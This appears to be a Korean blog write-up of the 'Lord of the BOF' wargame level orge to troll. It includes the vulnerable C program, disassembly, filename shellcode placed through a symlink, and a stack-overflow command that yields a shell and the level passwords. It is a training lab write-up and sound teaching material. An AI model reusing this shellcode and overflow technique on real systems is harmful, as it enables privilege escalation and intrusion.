[lob] orge -> trol

728x90

1. intro

2. code 및 분석

2.1 C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	// here is changed
	if(argc != 2){
		printf("argc must be two!\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

	// one more!
	memset(argv[1], 0, strlen(argv[1]));
}

2.3. 분석

2.3.1. assembler code (중요 부분)

이번에는 인자가 무조건 2개여야하며,

0x8048506 <main+6>:	cmpl   $0x2,0x8(%ebp)
0x804850a <main+10>:	je     0x8048523 <main+35>
0x804850c <main+12>:	push   $0x8048690
0x8048511 <main+17>:	call   0x8048410 <printf>
0x8048516 <main+22>:	add    $0x4,%esp
0x8048519 <main+25>:	push   $0x0
0x804851b <main+27>:	call   0x8048420 <exit>

환경 변수의 argv[1] 영역 또한 초기화 한다.

0x8048613 <main+275>:	add    $0xc,%esp
0x8048616 <main+278>:	mov    0xc(%ebp),%eax
0x8048619 <main+281>:	add    $0x4,%eax
0x804861c <main+284>:	mov    (%eax),%edx
0x804861e <main+286>:	push   %edx
0x804861f <main+287>:	call   0x80483f0 <strlen>
0x8048624 <main+292>:	add    $0x4,%esp
0x8048627 <main+295>:	mov    %eax,%eax
0x8048629 <main+297>:	push   %eax
0x804862a <main+298>:	push   $0x0
0x804862c <main+300>:	mov    0xc(%ebp),%eax
0x804862f <main+303>:	add    $0x4,%eax
0x8048632 <main+306>:	mov    (%eax),%edx
0x8048634 <main+308>:	push   %edx
0x8048635 <main+309>:	call   0x8048430 <memset>
0x804863a <main+314>:	add    $0xc,%esp
0x804863d <main+317>:	leave  
0x804863e <main+318>:	ret    
0x804863f <main+319>:	nop

3. 취약점 확인 및 공격 준비

3.1 취약점

앞선 문제와 동일하다.

3.2 공격 준비

이번에는 모든 영역이 초기화되고, 유일하게 argv[0]인 파일명 부분만 남아있으며, stack 영역을 사용해야하므로 심볼릭 링크를 통한 파일명 shellcode를 사용해야한다.

이를 인터넷에서 찾아보면 아래와 같다.

\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

이를 파일명으로 symbolic link 후 시도해보자.

[orge@localhost orge]$ ln -s trola `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
trola
troll
troll.c

4. exploit

간단히 아래와 같이 처리 가능하다.

[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) groups=507(orge)
bash$ my-pass
euid = 507
timewalker
[orge@localhost orge]$ ln -s troll `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50̀\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin

물론 지금까지 사용한 my-pass를 실행해주는 shellcode를 수정해도 되겠지만... 귀찮........

원리는 0x2f가 아닌 0x2e + 0x01 과 같은 식으로 어셈블러 코드를 작성해주면 된다.